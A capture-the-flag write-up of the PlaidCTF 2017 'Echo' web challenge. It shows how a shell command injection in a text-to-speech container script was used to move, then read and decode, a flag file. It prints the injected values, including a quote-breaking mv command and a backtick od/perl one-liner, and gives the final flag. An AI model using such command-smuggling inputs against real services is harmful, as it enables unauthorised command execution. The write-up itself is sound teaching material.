---
layout: post
title: "PlaidCTF 2017 - Echo"
category: writeups
author: thezero
tags: plaidctf-2017 web
---

Web - 200 Points

If you hear enough, you may hear the whispers of a key...
If you see app.py well enough, you will notice the UI sucks...

[http://echo.chal.pwning.xxx:9977/](http://echo.chal.pwning.xxx:9977/)

### Writeup

The server execute a text-to-speech software on 4 tweets as input and let you listen to the wav output files.  
The text-to-speech process is executed in a docker image called [lumjjb/echo_container](https://hub.docker.com/r/lumjjb/echo_container/)  
Inside the docker container, the file [run.py](https://gist.github.com/TheZ3ro/a83a05a3a6d3a8cd967ec325f276470a) performs the text-to-speech.  
The tweets are written to a file `input`. In the same folder the server saves the `flag` file that has the encrypted flag inside.    
This folder is then shared with the docker TTS container.

In line 30 of `run.py` file there is a command execution vulnerability for the variable `l`

We tried moving the flag file to a wav file in the `out` folder with this payload  
`";mv /share/flag "/share/out/1.wav`.  
After the TTS step the wav files are converted with ffmpeg and the conversion output is stored in the folder served by the webserver. 
Unfortunately when the flag file (txt) is moved to a wav, ffmpeg returns an error and no file is stored as output.

So we thought it would be nice to read the flag file directly with the TTS, but the server returned a 500 error.  
The flag file had lots of unpronounceable characters, and it was **2470000** chars long, *65000* for every character in the flag, so the flag was actually **38** char long.

So we decided to write a small payload that decrypt the flag on the docker, let the server process the flag as TTS, convert the wav and the we would listen to the flag.  
Since the TTS wasn't good we splitted the flag text into single char converted to decimal.

This was out python payload. Too long to fit in 4 tweets
{% highlight python %}
def decode_flag(f):
    for i in range(0, len(f),65000):
        if i+64999 > len(f):
            break
        fs=f[i:i+64999]
        c=f[i+64999]
        p=0
        for k in fs:
           p=p^ord(k)
{% endhighlight %}

So we used this smaller one (that even fits in one tweet! ^.^ )
```
`od -v -w1 -An -t uC /share/flag | perl -e 'my $i=0;my $x=0;while(<>){ $i++;$x^=$_; if($i==65000){$i=0;print $x." "; $x=0;}  };'`
```


And the flag!
`80 67 84 71 123 76 49 53 115 116 51 110 95 84 48 95 95 114 101 101 101 95 114 101 101 101 101 101 101 95 114 101 101 101 95 108 97 125`

Ops, Sorry! 
The Flag:
`PCTF{L15st3n_T0__reee_reeeeee_reee_la}`
